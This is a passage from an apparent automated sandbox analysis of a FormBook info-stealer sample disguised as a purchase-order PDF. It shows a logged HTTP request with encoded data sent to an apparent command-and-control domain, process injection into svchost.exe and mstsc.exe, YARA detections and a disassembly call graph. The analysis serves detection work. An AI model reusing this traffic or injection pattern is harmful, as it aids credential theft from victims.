                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.b5x7vk.agency/zznj/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 61 50 58 36 63 68 65 4c 6d 4f 73 63 30 57 51 53 34 63 32 2b 37 4b 6b 77 38 78 77 7a 49 65 35 6a 36 50 62 37 69 36 6e 44 76 44 4f 52 42 31 58 36 79 36 6d 44 50 4d 45 4f 36 56 36 77 5a 62 78 34 50 58 6f 35 32 46 4c 33 72 38 37 4d 49 77 34 45 65 59 75 70 62 6d 32 38 77 6c 62 73 69 69 34 36 37 61 53 73 4a 4e 34 67 37 51 43 57 59 33 35 58 38 52 53 49 76 41 56 34 54 35 58 61 69 57 4f 6e 76 30 50 41 59 73 4d 79 35 67 68 62 7a 44 5a 61 33 4a 36 74 62 6b 2b 34 4d 6f 4a 4b 78 78 42 71 61 78 58 76 35 5a 64 49 44 6a 45 31 38 4d 72 6f 6e 43 43 53 4d 47 52 33 4b 4b 36 34 4a 76 78 49 51 74 47 65 59 52 51 50 61 55 58 69 50 35 6c 41 6e 4d 46 4f 76 68 6c 4b 62 2b 57 71 4e 4d 4b 43 70 66 6f 30 46 50 5a 4a 49 53 70 45 44 77 4f 6d 53 66 51 74 6e 51 52 69 65 46 4a 6c 57 4f 52 47 75 74 30 30 52 66 45 4a 53 72 49 35 53 52 4b 6d 63 41 35 55 4a 7a 41 39 79 50 2b 59 4d 46 69 73 30 54 68 4b 48 6a 61 6f 41 6f 38 49 56 66 51 51 4c 78 61 75 4d 75 50 6b 35 30 73 47 78 78 4c 4d 62 6c 44 6f 6d 34 72 78 78 61 35 [TRUNCATED]
                                              Data Ascii: vf5pwn=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk+4MoJKxxBqaxXv5ZdIDjE18MronCCSMGR3KK64JvxIQtGeYRQPaUXiP5lAnMFOvhlKb+WqNMKCpfo0FPZJISpEDwOmSfQtnQRieFJlWORGut00RfEJSrI5SRKmcA5UJzA9yP+YMFis0ThKHjaoAo8IVfQQLxauMuPk50sGxxLMblDom4rxxa5xhz6FmTDEjgZMQdzA1U68jAC6rtjQ3gnjhNoxq522YAjBidpZxfy7MKRMLgExonGnqx/4rN9pj/SEssAvkKovW9YzoeHFpd7fKNO5PKUG+MANN6NfsbO2JJD7O9DenvksuIKzVEaCg7M8dVrnLTlktT/Cn6EfrIlmMVEe906pEzog2gNfHZN00Ur4bImHIZQsF/VFVh2k/rUITpoXnjBn5iY1DOz8jFpd81ajrh40tUzhqyaUeXMdHTvxChwB002LLkB8oRZAKNr+pICE7iQsnnyUE0zCKzYHtZW+IineEWEAnq4Q+DoEDr7t4UNeUwJ7bZeZm9q/sMerUm02A7ChfqYKe2lWb1S+xho65B0CnAlfo8gnMrd6P7eaEhP0GkEjwqQOEZGpOVxeskvOpSbMPtf9HI7o88hMzyDEgW/H/NebJSjXJ4e3xghuGf9VAOI01oA8F+ENgZ2jexAS9qh+lmvwotSS+F7SUHXKpATONfBv8c4PHwLojURkYg0XP1Fa+JZEJ14AU6db+aj2crxkmAbCbr+wJcjP9pxy6olaeVz+AfxCDjcg4QuTu34QsJWQIXzAkB93LBD120SY+E80vlvmynuhdMoroDoWtOAkMtOQXlG8Hjp9h/vQHzV5YURyw3SR+RwnUJl57IPBm1bY7MRVc+7jVeHny [TRUNCATED]
                                              Sep 26, 2024 15:25:07.010147095 CEST752INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:25:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IProemyRG98En7CWZdF5GfaX%2FSemz5Ye%2BaDogSHz%2FU3WGZsXphsfVu4nAYsd1MLoJaxK1nz%2BqW7CmqVrraUXmpxK8CCNoNnbvuyhZRFApA2N1VLsn%2BlD%2BvpUWVFo%2FsnxdOtvlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9393fb0e5918bc-EWR
                                              Content-Encoding: gzip
                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:21:58
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
                                              Imagebase:0x10000
                                              File size:1'085'440 bytes
                                              MD5 hash:0C3D90F3A7607383E1E4A5DA779B23F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:09:21:59
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"
                                              Imagebase:0x160000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:09:22:02
                                              Start date:26/09/2024
                                              Path:C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe"
                                              Imagebase:0x770000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:09:22:04
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\mstsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                              Imagebase:0xfa0000
                                              File size:1'264'640 bytes
                                              MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:6
                                              Start time:09:22:30
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:5.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:3.9%
                                                Total number of Nodes:1137
                                                Total number of Limit Nodes:52
                                                execution_graph 35251 1f5c0 35252 1f7b0 35251->35252 35253 1f61a 35251->35253 35281 17f41 35252->35281 35254 54777 35253->35254 35255 1f626 35253->35255 35285 8bd80 74 API calls 35254->35285 35279 1f3f0 60 API calls _memmove 35255->35279 35259 1f65d 35260 1f790 35259->35260 35266 73c7b 35259->35266 35269 15dcf 35259->35269 35273 14faa 35259->35273 35262 1f743 35262->35260 35280 19df0 59 API calls 35262->35280 35286 7449b GetFileAttributesW 35266->35286 35270 15dd9 35269->35270 35271 15de8 35269->35271 35270->35262 35271->35270 35272 15ded CloseHandle 35271->35272 35272->35270 35274 14fb4 35273->35274 35275 14fbb 35273->35275 35290 35516 35274->35290 35277 14fdb FreeLibrary 35275->35277 35278 14fca 35275->35278 35277->35278 35278->35262 35279->35259 35280->35262 35282 17f50 __wsetenvp _memmove 35281->35282 35479 30f36 35282->35479 35284 17f8e 35284->35259 35285->35260 35287 73c82 35286->35287 35288 744b6 FindFirstFileW 35286->35288 35287->35262 35288->35287 35289 744cb FindClose 35288->35289 35289->35287 35291 35522 __getstream 35290->35291 35292 35536 35291->35292 35293 3554e 35291->35293 35325 38ca8 58 API calls __getptd_noexit 35292->35325 35300 35546 __getstream 35293->35300 35303 36d8e 35293->35303 35296 3553b 35326 38f36 9 API calls __cftof_l 35296->35326 35300->35275 35304 36dc0 RtlEnterCriticalSection 35303->35304 35305 36d9e 35303->35305 35306 35560 35304->35306 35305->35304 35307 36da6 35305->35307 35309 354aa 35306->35309 35328 39d8b 35307->35328 35310 354b9 35309->35310 35311 354cd 35309->35311 35380 38ca8 58 API calls __getptd_noexit 35310->35380 35314 354c9 35311->35314 35337 34bad 35311->35337 35313 354be 35381 38f36 9 API calls __cftof_l 35313->35381 35327 35585 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 35314->35327 35321 354e7 35354 40b82 35321->35354 35323 354ed 35323->35314 35382 32ed5 35323->35382 35325->35296 35326->35300 35327->35300 35329 39daf RtlEnterCriticalSection 35328->35329 35330 39d9c 35328->35330 35329->35306 35335 39e13 58 API calls 9 library calls 35330->35335 35332 39da2 35332->35329 35336 33235 58 API calls 3 library calls 35332->35336 35335->35332 35338 34bc0 35337->35338 35342 34be4 35337->35342 35339 34856 __ftell_nolock 58 API calls 35338->35339 35338->35342 35340 34bdd 35339->35340 35388 3da06 35340->35388 35343 40cf7 35342->35343 35344 354e1 35343->35344 35345 40d04 35343->35345 35347 34856 35344->35347 35345->35344 35346 32ed5 _free 58 API calls 35345->35346 35346->35344 35348 34860 35347->35348 35349 34875 35347->35349 35433 38ca8 58 API calls __getptd_noexit 35348->35433 35349->35321 35351 34865 35434 38f36 9 API calls __cftof_l 35351->35434 35353 34870 35353->35321 35355 40b8e __getstream 35354->35355 35356 40bb2 35355->35356 35357 40b9b 35355->35357 35358 40c3d 35356->35358 35360 40bc2 35356->35360 35450 38c74 58 API calls __getptd_noexit 35357->35450 35455 38c74 58 API calls __getptd_noexit 35358->35455 35363 40be0 35360->35363 35364 40bea 35360->35364 35362 40ba0 35451 38ca8 58 API calls __getptd_noexit 35362->35451 35452 38c74 58 API calls __getptd_noexit 35363->35452 35368 3d386 ___lock_fhandle 59 API calls 35364->35368 35365 40be5 35456 38ca8 58 API calls __getptd_noexit 35365->35456 35370 40bf0 35368->35370 35372 40c03 35370->35372 35373 40c0e 35370->35373 35371 40c49 35457 38f36 9 API calls __cftof_l 35371->35457 35435 40c5d 35372->35435 35453 38ca8 58 API calls __getptd_noexit 35373->35453 35376 40ba7 __getstream 35376->35323 35378 40c09 35454 40c35 RtlLeaveCriticalSection __unlock_fhandle 35378->35454 35380->35313 35381->35314 35383 32f07 _free 35382->35383 35384 32ede RtlFreeHeap 35382->35384 35383->35314 35384->35383 35385 32ef3 35384->35385 35478 38ca8 58 API calls __getptd_noexit 35385->35478 35387 32ef9 GetLastError 35387->35383 35389 3da12 __getstream 35388->35389 35390 3da36 35389->35390 35391 3da1f 35389->35391 35392 3dad5 35390->35392 35394 3da4a 35390->35394 35422 38c74 58 API calls __getptd_noexit 35391->35422 35428 38c74 58 API calls __getptd_noexit 35392->35428 35398 3da72 35394->35398 35399 3da68 35394->35399 35396 3da24 35423 38ca8 58 API calls __getptd_noexit 35396->35423 35413 3d386 35398->35413 35424 38c74 58 API calls __getptd_noexit 35399->35424 35400 3da6d 35429 38ca8 58 API calls __getptd_noexit 35400->35429 35403 3da78 35411 3da8b 35403->35411 35425 38ca8 58 API calls __getptd_noexit 35403->35425 35405 3dae1 35430 38f36 9 API calls __cftof_l 35405->35430 35408 3da2b __getstream 35408->35342 35409 3daa3 35426 38c74 58 API calls __getptd_noexit 35409->35426 35427 3dacd RtlLeaveCriticalSection __unlock_fhandle 35411->35427 35415 3d392 __getstream 35413->35415 35414 3d3e1 RtlEnterCriticalSection 35416 3d407 __getstream 35414->35416 35415->35414 35417 39d8b __lock 58 API calls 35415->35417 35416->35403 35418 3d3b7 35417->35418 35419 3d3cf 35418->35419 35431 39fab InitializeCriticalSectionAndSpinCount 35418->35431 35432 3d40b RtlLeaveCriticalSection _doexit 35419->35432 35422->35396 35423->35408 35424->35400 35425->35409 35426->35411 35427->35408 35428->35400 35429->35405 35430->35408 35431->35419 35432->35414 35433->35351 35434->35353 35458 3d643 35435->35458 35437 40c6b 35438 40cc1 35437->35438 35440 3d643 __lseeki64_nolock 58 API calls 35437->35440 35449 40c9f 35437->35449 35471 3d5bd 59 API calls 2 library calls 35438->35471 35443 40c96 35440->35443 35441 3d643 __lseeki64_nolock 58 API calls 35444 40cab CloseHandle 35441->35444 35442 40cc9 35445 40ceb 35442->35445 35472 38c87 58 API calls 3 library calls 35442->35472 35447 3d643 __lseeki64_nolock 58 API calls 35443->35447 35444->35438 35448 40cb7 GetLastError 35444->35448 35445->35378 35447->35449 35448->35438 35449->35438 35449->35441 35450->35362 35451->35376 35452->35365 35453->35378 35454->35376 35455->35365 35456->35371 35457->35376 35459 3d663 35458->35459 35460 3d64e 35458->35460 35465 3d688 35459->35465 35475 38c74 58 API calls __getptd_noexit 35459->35475 35473 38c74 58 API calls __getptd_noexit 35460->35473 35462 3d653 35474 38ca8 58 API calls __getptd_noexit 35462->35474 35465->35437 35466 3d692 35476 38ca8 58 API calls __getptd_noexit 35466->35476 35468 3d65b 35468->35437 35469 3d69a 35477 38f36 9 API calls __cftof_l 35469->35477 35471->35442 35472->35445 35473->35462 35474->35468 35475->35466 35476->35469 35477->35468 35478->35387 35480 30f3e 35479->35480 35482 30f58 35480->35482 35484 30f5c std::exception::exception 35480->35484 35489 3588c 35480->35489 35506 33521 RtlDecodePointer 35480->35506 35482->35284 35507 3871b RaiseException 35484->35507 35486 30f86 35508 38651 58 API calls _free 35486->35508 35488 30f98 35488->35284 35490 35907 35489->35490 35496 35898 35489->35496 35515 33521 RtlDecodePointer 35490->35515 35492 3590d 35516 38ca8 58 API calls __getptd_noexit 35492->35516 35493 358a3 35493->35496 35509 3a2eb 58 API calls 2 library calls 35493->35509 35510 3a348 58 API calls 8 library calls 35493->35510 35511 3321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 35493->35511 35496->35493 35497 358cb RtlAllocateHeap 35496->35497 35500 358f3 35496->35500 35504 358f1 35496->35504 35512 33521 RtlDecodePointer 35496->35512 35497->35496 35498 358ff 35497->35498 35498->35480 35513 38ca8 58 API calls __getptd_noexit 35500->35513 35514 38ca8 58 API calls __getptd_noexit 35504->35514 35506->35480 35507->35486 35508->35488 35509->35493 35510->35493 35512->35496 35513->35504 35514->35498 35515->35492 35516->35498 35521 1acc2 35522 30f36 59 API calls 35521->35522 35523 1ace1 35522->35523 35524 30f36 59 API calls 35523->35524 35526 1acfd 35524->35526 35525 1b664 35526->35525 35535 22123 35526->35535 35568 15906 35526->35568 35527 1aea4 35528 50bb5 35527->35528 35532 1aeac 35527->35532 35578 663f2 59 API calls 35528->35578 35530 1aef2 35532->35530 35577 19df0 59 API calls 35532->35577 35579 19bf8 35535->35579 35538 30f36 59 API calls 35539 22154 35538->35539 35540 22164 35539->35540 35541 15906 60 API calls 35539->35541 35592 19997 59 API calls 3 library calls 35540->35592 35541->35540 35543 22172 35593 15956 35543->35593 35545 22189 35549 2219d 35545->35549 35604 15e3f 35545->35604 35550 56940 35549->35550 35551 221b7 35549->35551 35552 30f36 59 API calls 35550->35552 35609 177c7 35551->35609 35554 56946 35552->35554 35556 5695a 35554->35556 35631 159b0 ReadFile SetFilePointerEx 35554->35631 35562 5695e _memmove 35556->35562 35632 7776d 59 API calls _memset 35556->35632 35560 221ce 35560->35562 35628 19b9c 59 API calls 35560->35628 35563 221e2 35564 2221c 35563->35564 35565 15dcf CloseHandle 35563->35565 35564->35527 35566 22210 35565->35566 35566->35564 35629 15a1a CloseHandle 35566->35629 35569 30f36 59 API calls 35568->35569 35570 15916 35569->35570 35571 15dcf CloseHandle 35570->35571 35572 15921 35571->35572 35573 177c7 59 API calls 35572->35573 35574 15929 35573->35574 35575 15dcf CloseHandle 35574->35575 35576 15930 35575->35576 35576->35527 35577->35532 35578->35530 35580 19c08 35579->35580 35581 4fb2f 35579->35581 35586 30f36 59 API calls 35580->35586 35582 4fb40 35581->35582 35633 17d2c 35581->35633 35642 17eec 35582->35642 35585 4fb4a 35589 19c34 35585->35589 35590 177c7 59 API calls 35585->35590 35587 19c1b 35586->35587 35587->35585 35588 19c26 35587->35588 35588->35589 35591 17f41 59 API calls 35588->35591 35589->35538 35589->35545 35590->35589 35591->35589 35592->35543 35594 15dcf CloseHandle 35593->35594 35595 15962 35594->35595 35653 15df9 35595->35653 35597 15981 35601 159a4 35597->35601 35661 15770 35597->35661 35599 15993 35678 153db SetFilePointerEx SetFilePointerEx 35599->35678 35601->35545 35630 15a1a CloseHandle 35601->35630 35602 1599a 35602->35601 35679 7349e 35602->35679 35605 15c4e 2 API calls 35604->35605 35606 15e60 35605->35606 35607 15c4e 2 API calls 35606->35607 35608 15e74 35607->35608 35608->35549 35610 30f36 59 API calls 35609->35610 35611 177e8 35610->35611 35612 30f36 59 API calls 35611->35612 35613 177f6 35612->35613 35614 156d2 35613->35614 35615 15702 35614->35615 35616 156dd 35614->35616 35617 17eec 59 API calls 35615->35617 35616->35615 35620 156ec 35616->35620 35621 732a2 35617->35621 35618 732d1 35618->35560 35712 15c18 35620->35712 35621->35618 35711 7323e ReadFile SetFilePointerEx 35621->35711 35627 733e0 35627->35560 35628->35563 35629->35564 35630->35545 35631->35556 35632->35562 35634 17da5 35633->35634 35635 17d38 __wsetenvp 35633->35635 35648 17e8c 35634->35648 35637 17d73 35635->35637 35638 17d4e 35635->35638 35647 18189 59 API calls 35637->35647 35646 18087 59 API calls 35638->35646 35641 17d56 _memmove 35641->35582 35643 17f06 35642->35643 35644 17ef9 35642->35644 35645 30f36 59 API calls 35643->35645 35644->35585 35645->35644 35646->35641 35647->35641 35649 17ea3 _memmove 35648->35649 35650 17e9a 35648->35650 35649->35641 35650->35649 35652 17faf 59 API calls _memmove 35650->35652 35652->35649 35654 15e12 CreateFileW 35653->35654 35655 4e0b1 35653->35655 35657 15e34 35654->35657 35656 4e0b7 CreateFileW 35655->35656 35655->35657 35656->35657 35658 4e0dd 35656->35658 35657->35597 35682 15c4e 35658->35682 35662 4defe 35661->35662 35663 1578b 35661->35663 35667 15e3f 2 API calls 35662->35667 35672 1581a 35662->35672 35664 15c4e 2 API calls 35663->35664 35663->35672 35665 157ad 35664->35665 35692 1538e 35665->35692 35667->35672 35669 157c4 35670 30f36 59 API calls 35669->35670 35671 157cf 35670->35671 35673 1538e 59 API calls 35671->35673 35672->35599 35674 157da 35673->35674 35695 15d20 35674->35695 35677 15c4e 2 API calls 35677->35672 35678->35602 35702 7339d 35679->35702 35681 734aa WriteFile 35681->35601 35689 15c68 35682->35689 35683 4e081 35691 15dae SetFilePointerEx 35683->35691 35684 15cef SetFilePointerEx 35690 15dae SetFilePointerEx 35684->35690 35687 15cc3 35687->35657 35688 4e09b 35689->35683 35689->35684 35689->35687 35690->35687 35691->35688 35693 30f36 59 API calls 35692->35693 35694 153a0 35693->35694 35694->35662 35694->35669 35696 15d93 35695->35696 35700 15d2e 35695->35700 35701 15dae SetFilePointerEx 35696->35701 35698 15807 35698->35677 35699 15d66 ReadFile 35699->35698 35699->35700 35700->35698 35700->35699 35701->35700 35703 733a4 35702->35703 35704 733af 35702->35704 35709 15dae SetFilePointerEx 35703->35709 35704->35681 35706 73409 SetFilePointerEx 35710 15dae SetFilePointerEx 35706->35710 35708 73428 35708->35681 35709->35706 35710->35708 35711->35621 35713 30f36 59 API calls 35712->35713 35714 15c2b 35713->35714 35715 30f36 59 API calls 35714->35715 35716 15c37 35715->35716 35717 15632 35716->35717 35724 15a2f 35717->35724 35719 15d20 2 API calls 35722 15643 35719->35722 35721 15674 35721->35627 35723 1793a 61 API calls 35721->35723 35722->35719 35722->35721 35731 15bda 59 API calls _memmove 35722->35731 35723->35627 35725 4df95 35724->35725 35726 15a40 35724->35726 35732 66223 59 API calls 35725->35732 35726->35722 35728 4df9f 35729 30f36 59 API calls 35728->35729 35730 4dfab 35729->35730 35731->35722 35732->35728 35733 14205 35738 181a7 35733->35738 35735 1417e _memset _wcscpy 35736 141e6 Shell_NotifyIconW 35735->35736 35737 14200 35736->35737 35739 181b2 35738->35739 35740 181ba 35738->35740 35742 180d7 59 API calls _memmove 35739->35742 35740->35735 35742->35740 35743 1e70b 35746 1d260 35743->35746 35745 1e719 35747 1d27d 35746->35747 35761 1d4dd 35746->35761 35748 52a39 35747->35748 35749 529ea 35747->35749 35753 1d2a4 35747->35753 35788 8a4fb 69 API calls __cinit 35748->35788 35752 529ed 35749->35752 35757 52a08 35749->35757 35752->35753 35754 529f9 35752->35754 35759 1d594 35753->35759 35753->35761 35764 52b55 35753->35764 35773 181a7 59 API calls 35753->35773 35775 188a0 68 API calls __cinit 35753->35775 35776 186a2 68 API calls 35753->35776 35777 18620 69 API calls 35753->35777 35779 1859a 68 API calls 35753->35779 35780 1d0dc 59 API calls 35753->35780 35781 19f3a 59 API calls 35753->35781 35782 32ec0 35753->35782 35785 1cedd 60 API calls 35753->35785 35789 18bb2 68 API calls 35753->35789 35790 19e9c 60 API calls 35753->35790 35791 66ae3 60 API calls 35753->35791 35786 8ab0f 69 API calls 35754->35786 35757->35761 35787 8afb7 69 API calls 2 library calls 35757->35787 35778 18bb2 68 API calls 35759->35778 35761->35745 35763 1d5a3 35763->35745 35792 8a866 59 API calls 35764->35792 35773->35753 35775->35753 35776->35753 35777->35753 35778->35763 35779->35753 35780->35753 35781->35753 35793 32dc4 35782->35793 35784 32ecb 35784->35753 35785->35753 35786->35761 35787->35761 35788->35753 35789->35753 35790->35753 35791->35753 35792->35761 35794 32dd0 __getstream 35793->35794 35801 33397 35794->35801 35800 32df7 __getstream 35800->35784 35802 39d8b __lock 58 API calls 35801->35802 35803 32dd9 35802->35803 35804 32e08 RtlDecodePointer RtlDecodePointer 35803->35804 35805 32de5 35804->35805 35806 32e35 35804->35806 35815 32e02 35805->35815 35806->35805 35818 38924 59 API calls __cftof_l 35806->35818 35808 32e98 RtlEncodePointer RtlEncodePointer 35808->35805 35809 32e47 35809->35808 35810 32e6c 35809->35810 35819 389e4 61 API calls 2 library calls 35809->35819 35810->35805 35813 32e86 RtlEncodePointer 35810->35813 35820 389e4 61 API calls 2 library calls 35810->35820 35813->35808 35814 32e80 35814->35805 35814->35813 35821 333a0 35815->35821 35818->35809 35819->35810 35820->35814 35824 39ef5 RtlLeaveCriticalSection 35821->35824 35823 32e07 35823->35800 35824->35823 35825 13c4b 35826 13c55 35825->35826 35827 13c73 35826->35827 35831 144cb Shell_NotifyIconW _memset 35826->35831 35829 13c7a SetCurrentDirectoryW 35827->35829 35830 13c8f 35829->35830 35831->35827 35832 47f4e 35833 47f27 35832->35833 35834 47f5d 35832->35834 35840 38ca8 58 API calls __getptd_noexit 35833->35840 35842 47fa2 RtlLeaveCriticalSection __unlock_fhandle 35834->35842 35836 47f2c 35841 38f36 9 API calls __cftof_l 35836->35841 35839 47f36 __getstream 35840->35836 35841->35839 35842->35839 35843 30d88 35845 30d9d 35843->35845 35844 30e35 CallWindowProcA 35846 30e03 35844->35846 35845->35844 35845->35846 35847 1568a 35848 15c18 59 API calls 35847->35848 35849 1569c 35848->35849 35850 15632 61 API calls 35849->35850 35851 156aa 35850->35851 35853 156ba 35851->35853 35854 181c1 MultiByteToWideChar 35851->35854 35855 181e7 35854->35855 35856 1822e 35854->35856 35857 30f36 59 API calls 35855->35857 35858 17eec 59 API calls 35856->35858 35859 181fc MultiByteToWideChar 35857->35859 35861 18220 35858->35861 35862 178ad 59 API calls _memmove 35859->35862 35861->35853 35862->35861 35863 78b4a 35874 78aae 35863->35874 35866 78aae 74 API calls 35867 78b66 35866->35867 35868 78aae 74 API calls 35867->35868 35871 78ba6 35867->35871 35869 78b77 35868->35869 35870 78aae 74 API calls 35869->35870 35869->35871 35873 78b89 35870->35873 35872 78aae 74 API calls 35872->35873 35873->35871 35873->35872 35877 78ac1 35874->35877 35875 78b41 35875->35866 35875->35871 35876 78f48 74 API calls 35876->35877 35877->35875 35877->35876 35878 17c8f 35879 4efc4 35878->35879 35880 17ca0 35878->35880 35893 67f03 59 API calls _memmove 35879->35893 35887 17bb1 35880->35887 35883 17cac 35884 4efce 35885 181a7 59 API calls 35884->35885 35886 4efd6 35885->35886 35888 17bbf 35887->35888 35890 17be5 _memmove 35887->35890 35889 30f36 59 API calls 35888->35889 35888->35890 35891 17c34 35889->35891 35890->35883 35892 30f36 59 API calls 35891->35892 35892->35890 35893->35884 35894 14411 35895 14424 35894->35895 35900 14213 35895->35900 35899 144ba 35901 14227 Shell_NotifyIconW 35900->35901 35902 4d568 35900->35902 35901->35899 35902->35901 35903 4d571 DestroyCursor 35902->35903 35903->35901 35904 37dd3 35905 37ddf __getstream 35904->35905 35941 39f88 GetStartupInfoW 35905->35941 35908 37e3c 35910 37e47 35908->35910 36025 37f23 58 API calls 3 library calls 35908->36025 35909 37de4 35943 38cfc GetProcessHeap 35909->35943 35944 39c66 35910->35944 35913 37e4d 35914 37e58 __RTC_Initialize 